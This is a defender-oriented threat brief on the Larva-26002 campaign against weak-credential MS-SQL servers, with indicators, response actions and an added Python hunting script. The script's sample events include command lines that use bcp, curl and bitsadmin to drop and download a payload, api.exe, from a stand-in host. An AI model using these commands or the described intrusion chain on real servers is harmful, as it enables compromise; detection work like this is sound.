What happened
Threat actors continuously attacking MS-SQL servers are deploying the ICE Cloud scanner in a campaign tied to the threat actor Larva-26002. The activity has been ongoing since at least January 2024 and continued into 2026, with the attacker changing tools over time. In 2024, the group deployed Trigona and Mimic ransomware on internet-exposed MS-SQL servers with weak credentials. In 2025, it added Teramind and used a scanner written in Rust. In the 2026 activity, ASEC identified attacks in which the same actor compromised the same MS-SQL servers and deployed ICE Cloud, a scanner written in Go. The attacks begin with brute-force or dictionary attacks against exposed servers, after which the attacker uses the BCP utility, or PowerShell with Curl or Bitsadmin, to place malware on compromised hosts.
Who is affected
The direct exposure affects internet-facing MS-SQL servers with weak credentials and poor password hygiene. The article also describes compromised servers being used to scan other MS-SQL addresses with credential pairs supplied by the attacker’s command-and-control server, creating additional potential exposure for other database systems.
Why CISOs should care
This incident involves repeated compromise of the same MS-SQL servers across multiple years, with the tooling shifting from ransomware deployment to scanner malware. For CISOs, the business and operational relevance is that compromised database servers are being used to probe other database assets and return successful access results to the attacker’s command-and-control infrastructure.
3 practical actions:
- Identify exposed database assets: Confirm which internet-facing MS-SQL servers in your environment have weak password exposure or poor access controls consistent with the intrusion path described in the incident.
- Investigate the specific execution chain: Review affected systems for use of the BCP utility, PowerShell activity involving Curl or Bitsadmin, the table uGnzBdZbsi, the formatting file FODsOZKgAU.txt, and the file api.exe in C:\ProgramData\.
- Trace outbound scanner activity: Hunt for connections from compromised hosts to command-and-control infrastructure and for signs that the ICE Cloud client received MS-SQL target lists, credential pairs, and tasking from the server.
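As an added example (not part of the original report), the following Python script applies the execution-chain indicators from the second action to process-creation events. The event format, host names, parent images and command lines are constructed for the demo; only the indicator strings (BCP, Curl/Bitsadmin, uGnzBdZbsi, FODsOZKgAU.txt, C:\ProgramData\api.exe) come from the report.

```python
import re
from dataclasses import dataclass

# Indicator strings from the report; the label names on the left are ours.
INDICATORS = [
    ("bcp_utility", re.compile(r"\bbcp(\.exe)?\b", re.I)),
    ("downloader_curl_or_bitsadmin", re.compile(r"\b(curl|bitsadmin)(\.exe)?\b", re.I)),
    ("staging_table_uGnzBdZbsi", re.compile(r"uGnzBdZbsi")),
    ("format_file_FODsOZKgAU", re.compile(r"FODsOZKgAU\.txt", re.I)),
    ("dropped_api_exe", re.compile(r"c:\\programdata\\api\.exe", re.I)),
]

@dataclass
class Hit:
    host: str
    parent: str
    cmdline: str
    labels: list

def parse_event(line):
    # Constructed event format: timestamp|host|parent_image|command_line
    parts = line.rstrip("\n").split("|", 3)
    if len(parts) != 4:
        return None
    return dict(zip(("ts", "host", "parent", "cmdline"), parts))

def hunt(lines):
    """Return one Hit per event whose command line matches any indicator."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        labels = [name for name, rx in INDICATORS if rx.search(ev["cmdline"])]
        if labels:
            hits.append(Hit(ev["host"], ev["parent"], ev["cmdline"], labels))
    return hits

def hosts_by_hit_count(hits):
    """Rank hosts by how many distinct indicators fired, most suspicious first."""
    per_host = {}
    for h in hits:
        per_host.setdefault(h.host, set()).update(h.labels)
    return sorted(per_host.items(), key=lambda kv: -len(kv[1]))

# Constructed sample events: db01 shows the full chain, db02/ws07 are benign.
SAMPLE_EVENTS = [
    "2026-01-10T03:12:44Z|db01|sqlservr.exe|bcp uGnzBdZbsi out C:\\ProgramData\\api.exe -f C:\\ProgramData\\FODsOZKgAU.txt -T",
    "2026-01-10T03:13:02Z|db01|cmd.exe|powershell -c curl http://203.0.113.5/a -o C:\\ProgramData\\api.exe",
    "2026-01-10T03:13:30Z|db01|cmd.exe|bitsadmin /transfer j http://203.0.113.5/b C:\\ProgramData\\api.exe",
    "2026-01-10T08:00:00Z|db02|services.exe|sqlservr.exe -sMSSQLSERVER",
    "2026-01-10T08:05:00Z|ws07|explorer.exe|powershell -c Get-Date",
]

if __name__ == "__main__":
    for host, labels in hosts_by_hit_count(hunt(SAMPLE_EVENTS)):
        print(host, sorted(labels))
```

Feed real Sysmon/EDR process-creation exports through parse_event by adapting its field order; the indicator list is deliberately narrow, so treat any hit as a trigger for the full review described above rather than as proof of compromise.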
